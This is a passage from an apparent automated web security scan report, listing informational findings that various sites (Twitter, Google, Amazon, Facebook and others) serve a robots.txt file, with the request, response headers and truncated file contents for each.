Content-Type: text/plain
Date: Sun, 04 Sep 2011 03:05:42 GMT
Connection: close

User-agent: *
Disallow: /

27.125. http://thestar.com.my/news/story.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thestar.com.my
Path:   /news/story.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: thestar.com.my

Response

HTTP/1.1 200 OK
Content-Length: 96
Content-Type: text/plain
Last-Modified: Tue, 02 Sep 2008 09:15:22 GMT
Accept-Ranges: bytes
ETag: "40ed566ddccc91:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:18:11 GMT
Connection: close

#robots.txt for http://thestar.com.my/

User-agent: *
Disallow: /services/printerfriendly.asp

27.126. http://timescity.com/widget/toitopestw.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timescity.com
Path:   /widget/toitopestw.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: timescity.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:36:50 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 26 Jul 2011 13:43:55 GMT
ETag: "55fc65-265-4a8f91f761cc0"
Accept-Ranges: bytes
Content-Length: 613
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /
Disallow: /2db/
Disallow: /AjaxSearch/
Disallow: /ApiTcity/
Disallow: /coming/
Disallow: /fb/
Disallow: /gateway/
Disallow: /genhtml/
Disallow: /geodata/
Disallow: /ge
...[SNIP]...

27.127. http://timesofindia.indiatimes.com/city/mumbai/articlelist/-2128838597.cms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://timesofindia.indiatimes.com
Path:   /city/mumbai/articlelist/-2128838597.cms

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: timesofindia.indiatimes.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "dc51fb118a94949fd9edf3d762b452bc:1314966012"
Last-Modified: Fri, 02 Sep 2011 12:20:12 GMT
Accept-Ranges: bytes
Content-Length: 316
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:29:02 GMT
Connection: close
X-N: S

User-agent: *
Allow: /
Disallow: /topic/quote/
Disallow: /*cms.dll*
Disallow: /*rssarticleshow*
Disallow: /topic/photo/
Disallow: /default.cms
Disallow: /default1.cms
Disallow: /artshowcmt/
Disallow:
...[SNIP]...

27.128. http://translate.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: translate.google.com

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 04:21:18 GMT
Expires: Sun, 04 Sep 2011 04:21:18 GMT
Cache-Control: public, max-age=0
Content-Type: text/plain; charset=ISO-8859-1
X-Content-Type-Options: nosniff
Server: HTTP server (unknown)
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /?q=
Disallow: /?text=
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
D
...[SNIP]...

27.129. http://tweetmeme.com/auth/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tweetmeme.com
Path:   /auth/login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 04:21:38 GMT
Content-Type: text/plain
Content-Length: 97
Last-Modified: Mon, 13 Jul 2009 10:05:00 GMT
Connection: close
Expires: Sun, 04 Sep 2011 05:21:38 GMT
Cache-Control: max-age=3600
X-Served-By: h04
Accept-Ranges: bytes

User-Agent: *
Disallow: /bar/
Disallow: /auth/
Allow: /
Sitemap: http://tweetmeme.com/sitemap.xml

27.130. http://twitter.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:37 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 04:21:37 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

27.131. https://twitter.com/home  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://twitter.com
Path:   /home

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:21:56 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:23 GMT
Accept-Ranges: bytes
Content-Length: 519
Cache-Control: max-age=86400
Expires: Mon, 05 Sep 2011 04:21:56 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: text/plain; charset=UTF-8

#Google Search Engine Robot
User-agent: Googlebot
# Crawl-delay: 10 -- Googlebot ignores crawl-delay ftl
Allow: /*?*_escaped_fragment_
Disallow: /*?
Disallow: /*/with_friends

#Yahoo! Search Engine Ro
...[SNIP]...

27.132. http://unitus.synergy-e.com/www/delivery/spcjs.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://unitus.synergy-e.com
Path:   /www/delivery/spcjs.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: unitus.synergy-e.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 04 Sep 2011 02:25:07 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Sun, 29 May 2011 01:58:20 GMT
ETag: "3430740-17a-4a460814d8700"
Accept-Ranges: bytes
Content-Length: 378

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/). This file is required in the event that you
# use OpenX witho
...[SNIP]...

27.133. http://web.adblade.com/impsc.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://web.adblade.com
Path:   /impsc.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: web.adblade.com

Response

HTTP/1.0 200 OK
Connection: close
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "75974974"
Last-Modified: Mon, 22 Jun 2009 12:30:55 GMT
Content-Length: 28
Date: Sun, 04 Sep 2011 02:39:24 GMT
Server: lighttpd/1.4.18

User-agent: *
Disallow: /

27.134. http://webcache.googleusercontent.com/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://webcache.googleusercontent.com
Path:   /search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: webcache.googleusercontent.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:23:09 GMT
Expires: Sun, 04 Sep 2011 04:23:09 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.135. http://www.adbrite.com/mb/nai_optout_check.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.adbrite.com
Path:   /mb/nai_optout_check.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.adbrite.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Sep 2011 10:59:50 GMT
ETag: "1c62ca-54-49b2c0f55f340"
Last-Modified: Mon, 31 Jan 2011 22:37:25 GMT
Server: Apache
Content-Length: 84
Connection: close

User-agent: *
Disallow: /mb/commerce/login.php
Disallow: /zones/commerce/login.php

27.136. http://www.addthis.com/bookmark.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.addthis.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:14 GMT
Server: Apache
Last-Modified: Thu, 25 Aug 2011 20:30:26 GMT
ETag: "258981e-7b-4ab5a4c847c80"
Accept-Ranges: bytes
Content-Length: 123
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /analytics
Disallow: /test/
Disallow: /pages/toolbar

27.137. http://www.amazon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.amazon.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.amazon.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:19 GMT
Server: Server
Last-Modified: Thu, 11 Aug 2011 21:16:52 GMT
ETag: "115e-50cc3900"
Accept-Ranges: bytes
Content-Length: 4446
Vary: Accept-Encoding,User-Agent
Cneonction: close
Content-Type: text/plain
Connection: close

# Disallow all crawlers access to certain pages.

User-agent: *
Disallow: /exec/obidos/account-access-login
Disallow: /exec/obidos/change-style
Disallow: /exec/obidos/flex-sign-in
Disallow: /exec/obid
...[SNIP]...

27.138. http://www.asaservers.com/showpages.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.asaservers.com
Path:   /showpages.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.asaservers.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 04:23:20 GMT
Content-Length: 5210
Content-Type: text/plain
Last-Modified: Tue, 07 Jul 2009 12:49:13 GMT
Accept-Ranges: bytes
ETag: "fc78ce541ffc91:40f5"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET

User-agent: OmniExplorer_Bot
Disallow: /

User-agent: FreeFind
Disallow: /

User-agent: BecomeBot
Disallow: /

User-agent: Nutch
Disallow: /

User-agent: Jetbot/1.0
Disallow: /

User-agent: Jetbot
Dis
...[SNIP]...

27.139. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bangkokpost.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:25:00 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Tue, 28 Sep 2010 09:06:52 GMT
ETag: "17780cd-18-2a6b6300"
Accept-Ranges: bytes
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow:

27.140. http://www.bizographics.com/nai/status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizographics.com
Path:   /nai/status

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.bizographics.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Sun, 04 Sep 2011 11:00:42 GMT
Server: nginx/0.7.61
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

27.141. http://www.casalemedia.com/cgi-bin/naiOptout.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.casalemedia.com
Path:   /cgi-bin/naiOptout.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.casalemedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 10:59:03 GMT
Server: Apache
Last-Modified: Mon, 25 Oct 2010 22:17:08 GMT
ETag: "64956f-4e-5a594100"
Accept-Ranges: bytes
Content-Length: 78
Vary: Accept-Encoding
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /graphImages/
Disallow: /preview/

27.142. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.connect.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.27.202.125
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.143. http://www.dnaindia.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.dnaindia.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.dnaindia.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sun, 04 Sep 2011 02:31:17 GMT
ETag: "824c6-69-499e0659796c0"
Last-Modified: Sat, 15 Jan 2011 10:56:03 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 105
Connection: Close

User-agent: *
Allow: /
User-agent: Slurp
Crawl-delay: 30
Disallow: /email710.php
Disallow: /print710.php

27.144. http://www.egnyte.com/corp/lp1/FTP-site-2.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.egnyte.com
Path:   /corp/lp1/FTP-site-2.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.egnyte.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:29:30 GMT
Server: Apache
Last-Modified: Fri, 13 Aug 2010 05:33:30 GMT
ETag: "5950016-1b6-48dadd2a91e80"
Accept-Ranges: bytes
Content-Length: 438
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Allow: /corp/
Disallow: /corp_css/
Disallow: /corp_css_brn/
Disallow: /corp_extJS/
Disallow: /corp_images/
Disallow: /corp_js/
Disallow: /css/
Disallow: /css_brn/
Disallow: /dom
...[SNIP]...

27.145. http://www.emirates.com/us/english/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.emirates.com
Path:   /us/english/index.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.emirates.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=1728000
Content-Length: 295
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 14:02:07 GMT
Accept-Ranges: bytes
ETag: "76c9f1412f58cc1:994c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:29:37 GMT
Connection: close

# robots.txt for http://www.emirates.com/

# Allow for all robots
User-agent: *

# Disallow any code/system sections
Disallow: /Controls
Disallow: /system
Disallow: /flash
Disallow: /ife
Dis
...[SNIP]...

27.146. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.64.223.35
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

27.147. http://www.fetchback.com/resources/naicheck.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fetchback.com
Path:   /resources/naicheck.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fetchback.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:50:51 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 24 Aug 2011 14:57:15 GMT
Accept-Ranges: bytes
Content-Length: 206
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 11:50:51 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

##
## Created: June 10th 2007.
## Updated: November 16th 2007.
##
##
User-agent: *

Disallow: /reports
Disallow: /dev
Disallow: /tmp
Disallow: /hub
Disallow: /adodb495a
Disallow: /adodb5
Disallow: /a
...[SNIP]...

27.148. http://www.godaddy.com/gdshop/ssl/ssl.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.godaddy.com
Path:   /gdshop/ssl/ssl.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.godaddy.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 04 Sep 2011 04:31:28 GMT
Connection: close
Content-Length: 718

#
# robots.txt
#
User-agent: Googlebot
Disallow: /about/godaddy-chinese.aspx
Disallow: /app
Disallow: /imag
Disallow: /out
Disallow: /gdshop/app
Disallow: /gdshop/clo
Disallow: /gdshop/con
Disallow: /
...[SNIP]...

27.149. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Sun, 04 Sep 2011 02:25:07 GMT
Expires: Sun, 04 Sep 2011 02:25:07 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

27.150. http://www.google.com/jsapi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /jsapi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:04:45 GMT
Expires: Sun, 04 Sep 2011 04:04:45 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.151. https://www.google.com/calendar  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.google.com
Path:   /calendar

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 04:39:03 GMT
Expires: Sun, 04 Sep 2011 04:39:03 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.152. http://www.googleadservices.com/pagead/conversion/1033191019/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1033191019/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 02:41:42 GMT
Expires: Sun, 04 Sep 2011 02:41:42 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.153. http://www.homestead.com/~site/go/search.ffhtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.homestead.com
Path:   /~site/go/search.ffhtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.homestead.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 04 Feb 2011 17:43:20 GMT
Accept-Ranges: bytes
ETag: "0ac3393c4cb1:0"
Server: Microsoft-IIS/7.5
Date: Sun, 04 Sep 2011 04:39:25 GMT
Connection: close
Content-Length: 625

# Block a bot that was causing issues by ignoring Disallow lines below
User-Agent: OmniExplorer_Bot
Disallow: /

# Block hotlinking of music files by projectplaylist.com due to perceived user band
...[SNIP]...

27.154. http://www.ig.gmodules.com/gadgets/proxy/refresh=86400&container=ig&rewriteMime=application%2Fx-shockwave-flash&gadget=http%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/yowidget.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ig.gmodules.com
Path:   /gadgets/proxy/refresh=86400&container=ig&rewriteMime=application%2Fx-shockwave-flash&gadget=http%3A%2F%2Fyowindow.com%2Fwimo%2Figoogle%2Fyowindow.xml/http://swf.yowindow.com/wimo/hpPal/yowidget.swf

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ig.gmodules.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Last-Modified: Thu, 11 Aug 2011 21:56:40 GMT
Date: Sun, 04 Sep 2011 02:30:50 GMT
Expires: Sun, 04 Sep 2011 02:30:50 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

27.155. http://www.isomedia.com/business-vps.shtml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.isomedia.com
Path:   /business-vps.shtml

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.isomedia.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:38 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Fri, 18 Jun 2010 18:48:39 GMT
ETag: "186055-57-6739afc0"
Accept-Ranges: bytes
Content-Length: 87
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

User-agent: Googlebot
Allow: /

User-Agent: MJ12bot
Disallow:


27.156. http://www.jdoqocy.com/click-2118118-10473284  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jdoqocy.com
Path:   /click-2118118-10473284

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jdoqocy.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "FhzzhbeZ+32"
Last-Modified: Wed, 24 Aug 2011 15:30:20 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 37
Date: Sun, 04 Sep 2011 04:39:39 GMT

# go away
User-agent: *
Disallow: /

27.157. http://www.linkedin.com/shareArticle  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /shareArticle

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.linkedin.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "-872004964"
Last-Modified: Wed, 06 Apr 2011 03:23:52 GMT
Content-Length: 24473
Connection: keep-alive
Date: Sun, 04 Sep 2011 04:39:40 GMT
Server: lighttpd

# Notice: If you would like to crawl LinkedIn,
# please email whitelistcrawl@linkedin.com to apply
# for white listing.

User-agent: Googlebot
Disallow: /addContacts*
Disallow: /addressBookExport*
D
...[SNIP]...

27.158. http://www.magicbricks.com/bricks/viewProperty.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.magicbricks.com
Path:   /bricks/viewProperty.html

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.magicbricks.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:39:49 GMT
Server: Apache/2.2.17 (Unix) DAV/2 mod_jk/1.2.31 mod_perl/2.0.5 Perl/v5.8.8
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

   User-agent: *
   Disallow: /

27.159. http://www.mathtag.com/cgi-bin/optout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mathtag.com
Path:   /cgi-bin/optout

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mathtag.com

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:04:58 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 10 Apr 2011 21:49:02 GMT
ETag: "e847f1-1a-4a0976d5a8f80"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

27.160. http://www.mediaplex.com/status_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediaplex.com
Path:   /status_pure.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mediaplex.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 17 Jun 2010 17:57:45 GMT
ETag: "6f42f-636-4893d9359f840"
Accept-Ranges: bytes
Content-Length: 1590
Content-Type: text/plain
Cache-Control: max-age=900
Expires: Sun, 04 Sep 2011 11:19:16 GMT
Date: Sun, 04 Sep 2011 11:04:16 GMT
Connection: close

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.161. http://www.modestogov.com/mpd/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.modestogov.com
Path:   /mpd/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.modestogov.com

Response

HTTP/1.1 200 OK
Content-Length: 210
Content-Type: text/plain
Last-Modified: Tue, 14 Apr 2009 18:26:24 GMT
Accept-Ranges: bytes
ETag: "2a7d3b842ebdc91:148a"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 04:37:48 GMT
Connection: close

# robots.txt
# City of Modesto Information Technology

User-agent: Roverbot
Disallow: /

User-agent: *
Disallow: /_bin/
Disallow: /search/
Disallow: /_private/
Disallow: /errors/
Disallow:
...[SNIP]...

27.162. http://www.mtv.com/news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /news/articles/1670220/linkin-park-chester-bennington-new-album.jhtml/x26amp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Thu, 31 Mar 2011 17:54:56 GMT
ETag: "4797a10-1cc-49fcafdbbdc00"
Accept-Ranges: bytes
Content-Length: 460
Content-Type: text/plain
Cache-Control: max-age=1800
Date: Sun, 04 Sep 2011 04:40:14 GMT
Connection: close

Sitemap: http://www.mtv.com/sitemap_index.jhtml
User-agent: *
Disallow: /search/
Disallow: /*source=SEM_    
Disallow: /*partnersearch=
Disallow: /*searchterm=
Disallow: /*sicontent=
Disallow: /ne
...[SNIP]...

27.163. http://www.mumbaimirror.com/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mumbaimirror.com
Path:   /index.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mumbaimirror.com

Response

HTTP/1.1 200 OK
Content-Length: 27
Content-Type: text/plain
Content-Location: http://www.mumbaimirror.com/robots.txt
Last-Modified: Thu, 17 Dec 2009 11:33:06 GMT
Accept-Ranges: bytes
ETag: "5a276eb3c7fca1:369"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 04 Sep 2011 05:16:44 GMT
Connection: close

User-agent: *
Allow: /


27.164. http://www.nationejobs.com/fulltime/displayposition_thai.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nationejobs.com
